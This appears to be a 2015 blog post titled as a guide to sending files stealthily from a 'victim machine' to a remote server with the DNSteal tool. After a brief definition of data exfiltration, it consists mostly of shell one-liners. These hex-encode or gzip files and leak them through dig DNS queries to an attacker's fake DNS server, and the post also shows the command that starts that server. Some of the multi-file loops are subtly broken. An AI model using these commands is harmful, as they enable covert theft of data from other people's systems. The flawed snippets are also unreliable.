Saturday, October 3, 2015

How To Send Files Stealthily To A Remote Machine Using "DNSteal"




Data exfiltration is sometimes referred to as data extrusion, data exportation, or data theft. All of these terms are used to describe the unauthorized transfer of data from a computer or other device.

Data exfiltration can be conducted manually, by an individual with physical access to a computer, but it can also be an automated process conducted through malicious programming over a network.

Generally, data exfiltration is a form of a security breach that occurs when data is downloaded or uploaded from a computer or server without authorization.These attacks are primarily intented so as to gain access to a network or machine's data.

Data exfiltration can be done using various method such as  by installing remote applications , removable media device , social engineering techniques or phishing emails.
But a new type of data exfiltration tool named "DNSteal" is released which is programmed to send files over to a remote machine via dns request.

DNSteal is a Data Exfiltration Tool that works  stealthily for sending files over DNS requests. Once install and run it acts as a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

Dnsteal code is available on GitHub.

Here's an example on how to use this tool

Usage:

On the victim machine, you simply send the following command:


for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done


Support for multiple files


for filename in $(ls); do for b in $(xxd -p $f); do dig +short @server %b.$filename.com; done; done



It also supports gzip compression of the file to allow for faster transfer speeds, this can be achieved using the "-z" switch:

python dnsteal.py 127.0.0.1 -z


Then on the victim machine send a Gzipped file like so:

for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done


or for multiple, gzip compressed files:

for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; done

No comments:

Post a Comment